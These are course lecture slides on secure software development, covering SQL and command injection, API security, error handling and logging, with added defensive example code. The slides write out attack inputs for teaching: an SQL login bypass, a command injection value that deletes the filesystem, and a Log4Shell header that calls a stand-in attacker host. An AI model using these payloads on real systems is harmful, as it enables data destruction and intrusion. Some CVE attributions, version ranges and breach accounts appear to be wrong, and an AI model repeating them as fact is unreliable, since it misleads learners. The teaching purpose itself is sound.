COMP3006_Secure_Software_Development Week 6

The document discusses Program Interaction Security, focusing on preventing common vulnerabilities like SQL injection, command injection, and API security issues. It highlights real-world incidents, mitigation strategies, and best practices for secure software development. Key topics include error handling, logging practices, and lessons learned from notable security breaches.
COMP3006 - Secure Software Development

Week 6: Program Interaction Security

Dr. Yusuf Kürsat Tuncel

Department of Computer Engineering

April 2025

Dr. Yusuf Kürsat Tuncel (Department of Computer Engineering) COMP3006 - Secure Software Development April 2025 1 / 39
Outline

1 Introduction to Program Interaction Security
2 SQL Injection
3 Case Study: BeyondTrust & PostgreSQL Injection
4 Command Injection
5 API Security
6 Error Handling and Logging
What is Program Interaction Security?

Ensures that software handles user inputs and external interactions securely
Protects against common injection attacks and improper resource access
Includes both prevention and mitigation mechanisms
Types of Program Interactions

User input (form fields, query strings)
File system access
Shell command execution
Database queries
API interactions
Understanding SQL Injection

Attacker manipulates input to alter SQL queries
Leads to unauthorized data access or corruption
SQL Injection Example

SELECT * FROM users WHERE username = '$user' AND password = '$password'

If $user is set to admin' --, the query becomes:

SELECT * FROM users WHERE username = 'admin' --' AND password = '$password'

Everything after -- is an SQL comment, so the password condition is never evaluated and the query matches the admin row.
Preventing SQL Injection

Use Prepared Statements / Parameterized Queries
Validate and sanitize all inputs
Use ORM libraries where applicable
Real-World Example: SQL Injection

Incident: Heartland Payment Systems (2008)

Attackers exploited SQL injection to plant malware in payment processing systems.
Over 100 million credit card numbers were stolen.
Cost the company over $140 million in losses.
CVEs Related to SQL Injection

CVE-2019-11043: PHP-FPM remote code execution via crafted URL in NGINX+PHP
CVE-2017-8917: Joomla SQLi via improper input sanitization in user model
CVE-2020-9484: Apache Tomcat session persistence flaw with file name injection
BeyondTrust + PostgreSQL SQL Injection

Vulnerability Chain: CVE-2025-1094 + BeyondTrust Misconfigurations

A zero-day SQL injection vulnerability was discovered in PostgreSQL 15.2 and 16.x.
Combined with flaws in BeyondTrust PRA and RS systems.
Allowed unauthenticated remote attackers to execute arbitrary SQL queries.
In chained scenarios, attackers achieved full remote code execution (RCE).
Source: The Hacker News, February 2025
Technical Details of CVE-2025-1094

SQL injection occurred due to unsafe dynamic query construction in a PostgreSQL extension.
Exploitable via `psql` or crafted REST API calls.
Improper sanitization of input strings passed to stored procedures.
Example: SELECT get_user_info('admin');--');
Exploit Flow

1 Attacker sends malicious input to public BeyondTrust API.
2 Input reaches PostgreSQL with unsanitized parameters.
3 SQL injection triggers unauthorized data access or role escalation.
4 Follow-up payload achieves remote code execution.
Impact and Affected Versions

Affected PostgreSQL: Versions 15.2–16.1.
Affected BeyondTrust: PRA <= 22.3, RS <= 23.1.1.
Consequences:
Exposure of credentials and internal session logs.
Access to system-level file storage.
Implantation of persistent access tools/backdoors.
Mitigation and Recommendations

Apply PostgreSQL and BeyondTrust patches immediately.
Use parameterized queries — avoid dynamic SQL concatenation.
Monitor `psql` and API logs for signs of injection patterns.
Restrict superuser privileges from exposed services.
Employ Web Application Firewalls (WAFs) with SQLi detection rules.
What is Command Injection?

Occurs when an attacker executes arbitrary commands on the host OS.
Exploits improper handling of user-supplied input used in system calls.
Can lead to full system compromise.
Vulnerable Code Example

import os
user = input("Enter filename: ")
os.system("cat " + user)  # the input is spliced into a shell command line and parsed by /bin/sh

User input: `test.txt; rm -rf /`
Preventing Command Injection

Avoid system calls if possible.
Use safe APIs (e.g., Python's `subprocess.run` with `shell=False`).
Validate input against a whitelist of allowed values.
Safer Python Code

import subprocess
user = input("Enter filename: ")
subprocess.run(["cat", user])  # argument list, no shell: the whole input is one argv entry for cat

No shell interpretation — safer against injection!
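The three command-injection slides above combined into one runnable piece, as an added example that is not part of the lecture material: the argument-list call that hands the slide's payload to cat as a single literal file name, plus the whitelist validation the prevention slide asks for. The regex, base-directory confinement and function names are constructed for the demo.

```python
import os
import re
import subprocess
import tempfile

# Allow-list, not deny-list: a plain file name with no separators, spaces or shell metacharacters.
SAFE_NAME = re.compile(r"[A-Za-z0-9_][A-Za-z0-9_.-]{0,254}")


def validate_filename(name, base_dir):
    """Return the absolute path of `name` inside `base_dir`, or raise ValueError."""
    if not SAFE_NAME.fullmatch(name):
        raise ValueError("invalid file name")
    base = os.path.realpath(base_dir)
    path = os.path.realpath(os.path.join(base, name))
    # Even a name that passed the regex must still resolve inside base_dir (symlinks).
    if os.path.dirname(path) != base:
        raise ValueError("file name escapes base directory")
    return path


def cat_file(name, base_dir):
    """Validated name + argument list + shell=False: nothing ever parses ';' or '|'."""
    path = validate_filename(name, base_dir)
    proc = subprocess.run(["cat", path], shell=False, capture_output=True, text=True, check=True)
    return proc.stdout


def cat_without_shell(raw_name):
    """What the slide's safer code does with a payload: cat receives ONE argument, literally that
    string, fails to open it, and nothing after the ';' is executed."""
    proc = subprocess.run(["cat", raw_name], shell=False, capture_output=True, text=True)
    return proc.returncode, proc.stdout


def demo():
    """Constructed sample: a real file in a temporary base directory."""
    with tempfile.TemporaryDirectory() as base_dir:
        with open(os.path.join(base_dir, "test.txt"), "w") as f:
            f.write("hello\n")
        return cat_file("test.txt", base_dir)
```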
Real-World Example: Command Injection

Incident: GitLab CE/EE (CVE-2018-19571)

GitLab's Git import feature allowed arbitrary command execution.
Attackers could run shell commands during repository import.
Patched in version 11.4.1.
Command Injection in Routers

CVE-2019-19824: TP-Link WR940N - root shell via ping diagnostics interface
CVE-2016-6277: NETGEAR R7000 - remote root via unauthenticated command injection
Impact: home routers, IoT devices, and enterprise gateways.
Real-World Example: Path Traversal

Incident: Equifax Breach Follow-Up (CVE-2017-5638)

Though a Struts vulnerability was exploited, the same system had path traversal issues in logs.
Logs were accessible due to poor path sanitation, aiding further lateral movement.
Notable CVEs for Path Traversal

CVE-2020-17506: Apache OFBiz path traversal — arbitrary file read via crafted URI
CVE-2021-41773: Apache HTTP Server — path traversal in default configs (RCE chain)
CVE-2019-11510: Pulse Secure VPN — allows unauthenticated file access via traversal
Why API Security Matters

APIs expose backend functionality to users.
Improper implementation can lead to privilege escalation, data leakage, etc.
Often targeted due to lack of visibility and access control.
Common API Vulnerabilities

Lack of authentication and authorization
Insecure direct object references (IDOR)
Excessive data exposure
Rate limiting absence
Real-World Example: API Security Misconfiguration

Incident: Facebook Graph API Leak (2018)

APIs leaked access tokens due to insufficient permission validation.
Over 50 million users affected.
Exploited chaining of video upload + preview APIs.
More API Security Breaches

T-Mobile (2021): Poorly secured API led to leak of 40M customer records.
Clubhouse (2021): Unauthenticated API allowed scraping of user profiles.
Parler (2021): No authentication on public APIs, exposed metadata and private info.
Best Practices for API Security

Use strong authentication and token validation (e.g., OAuth2, JWT).
Rate limit and throttle requests.
Avoid exposing internal implementation details.
Validate all client inputs and log abnormal usage patterns.
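An added example, not part of the lecture material, of one API endpoint that addresses the vulnerability list (missing authorization, IDOR, excessive data exposure, no rate limiting) and the best practices above. It assumes the caller's identity was already established by token validation upstream; the order table, the token-bucket limiter and the injectable clock are constructed for the demo.

```python
import time
from collections import defaultdict

# Constructed sample data: two users, each owning one order.
ORDERS = {101: {"owner": "alice", "item": "laptop", "card_last4": "4242", "internal_sku": "WH-77"},
          102: {"owner": "bob", "item": "phone", "card_last4": "1111", "internal_sku": "WH-12"}}
# Response allow-list: internal fields never leave the server (avoids excessive data exposure).
PUBLIC_FIELDS = ("item", "card_last4")


class RateLimiter:
    """Token bucket per client: `rate` requests per second sustained, bursts up to `burst`."""
    def __init__(self, rate, burst, clock=time.monotonic):
        self.rate, self.burst, self.clock = rate, burst, clock
        self.buckets = defaultdict(lambda: [burst, clock()])  # [tokens, last refill time]

    def allow(self, client):
        tokens, last = self.buckets[client]
        now = self.clock()
        tokens = min(self.burst, tokens + (now - last) * self.rate)
        if tokens < 1:
            self.buckets[client] = [tokens, now]
            return False
        self.buckets[client] = [tokens - 1, now]
        return True


def get_order(order_id, caller, limiter):
    """Authenticate, throttle, then authorize: the caller must own the object it references."""
    if caller is None:
        return 401, {"error": "authentication required"}
    if not limiter.allow(caller):
        return 429, {"error": "too many requests"}
    order = ORDERS.get(order_id)
    # Same answer for "missing" and "not yours": do not confirm that other users' objects exist.
    if order is None or order["owner"] != caller:
        return 404, {"error": "not found"}
    return 200, {k: order[k] for k in PUBLIC_FIELDS}
```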
Importance of Secure Error Handling

Revealed error messages may expose sensitive implementation details.
Attackers can infer backend technologies, libraries, database schema, etc.
Errors should be logged for auditing, but not shown to users.
Common Pitfalls in Error Handling

Displaying stack traces or debug logs to users
Inconsistent error codes revealing logic paths
Failing to sanitize or encode error messages
Not logging critical exceptions for forensic analysis
Best Practices for Error Handling

Show generic messages to users: "An error occurred, please try again."
Catch exceptions gracefully and log them with context.
Separate logs by severity level (info, warn, error, critical).
Don't log passwords, session tokens, or PII.
Best Practices for Logging

Use centralized and tamper-resistant logging.
Use standard formats (e.g., JSON logs for structured analysis).
Enable log rotation and secure storage.
Implement log alerts for critical events or threshold breaches.
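The error-handling and logging practices of the last four slides in one piece, as an added example that is not part of the lecture material: exceptions are logged as JSON with context and the full stack trace, secret fields are redacted before they are written, and the client receives only the generic message plus an id to quote. The field list, the in-memory handler and the function names are constructed for the demo.

```python
import json
import logging
import traceback
import uuid

# Field names whose values must never reach a log line (passwords, session tokens, API keys, PII).
SENSITIVE_KEYS = {"password", "passwd", "secret", "token", "access_token", "authorization", "api_key"}

def redact(value):
    """Recursively mask sensitive values inside nested dicts and lists."""
    if isinstance(value, dict):
        return {k: "[REDACTED]" if k.lower() in SENSITIVE_KEYS else redact(v) for k, v in value.items()}
    if isinstance(value, list):
        return [redact(v) for v in value]
    return value

class JsonFormatter(logging.Formatter):
    """One JSON object per line (structured logs); context and stack trace are kept, but redacted."""
    def format(self, record):
        entry = {"level": record.levelname, "logger": record.name, "msg": record.getMessage()}
        if getattr(record, "ctx", None):
            entry["ctx"] = redact(record.ctx)
        if record.exc_info:  # the full traceback goes to the log, never to the client
            entry["exc"] = "".join(traceback.format_exception(*record.exc_info))
        return json.dumps(entry)

class ListHandler(logging.Handler):
    """In-memory sink standing in for a central, tamper-resistant log store."""
    def __init__(self):
        super().__init__()
        self.lines = []
        self.setFormatter(JsonFormatter())
    def emit(self, record):
        self.lines.append(self.format(record))

def make_logger(name):
    logger, handler = logging.getLogger(name), ListHandler()
    logger.setLevel(logging.INFO)
    logger.addHandler(handler)
    return logger, handler

def handle_request(handler_fn, request, logger):
    """Run a handler; on failure log full context server-side and return only a generic message plus an id."""
    try:
        return 200, handler_fn(request)
    except Exception:
        error_id = uuid.uuid4().hex[:8]
        logger.error("request failed", exc_info=True, extra={"ctx": {"error_id": error_id, "request": request}})
        return 500, {"error": "An error occurred, please try again.", "error_id": error_id}
```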
Case Study: Log4Shell (CVE-2021-44228)

Vulnerability: Improper input handling in log messages

Log4j processed user input with ${jndi:...} lookup.
Allowed remote code execution via LDAP servers.
Affected millions of Java applications.
Log4Shell Exploit Example

User-Agent: ${jndi:ldap://attacker.com/a}

This value is logged, triggering a malicious JNDI lookup.
Lessons from Log4Shell

Never trust user input in logging systems.
Sanitize all data before logging.
Review third-party logging libraries for unsafe features.
Keep libraries up to date and monitor CVEs regularly.
Slack 2022 Token Leak

Issue: Private GitHub repo exposed authentication tokens

Developer logs included hardcoded and dynamically generated OAuth tokens.
These logs were pushed to GitHub, making secrets accessible publicly.
Attackers used leaked tokens to access Slack's internal systems.
Lessons from Slack Leak

Never log or store access tokens, secrets, passwords in plaintext.
Use tools like git-secrets, truffleHog, or Gitleaks to scan for exposed credentials.
Implement pre-commit hooks and secure logging practices.
Rotate and revoke tokens upon exposure — proactively monitor Git history.
Uber Security Breach (2022)

Method: Social engineering + privilege escalation

Attacker compromised internal tools using hardcoded credentials found in logs.
Logs contained cleartext secrets and tokens stored in network shares and Slack.
Full access to Uber's internal infrastructure, AWS, GCP, Slack, and source code.
Security Failures in Uber Breach

Exposed secrets in logs and shared messaging platforms.
No centralized credential vault or audit system.
Failure to apply least privilege principle.
Delayed breach detection due to lack of monitoring.
Prevention Lessons from Uber

Use vault solutions (e.g., HashiCorp Vault) for secret storage.
Don't log environment variables, tokens, or credentials.
Regularly audit logs and internal messaging systems.
Train developers on secure logging and trace redaction.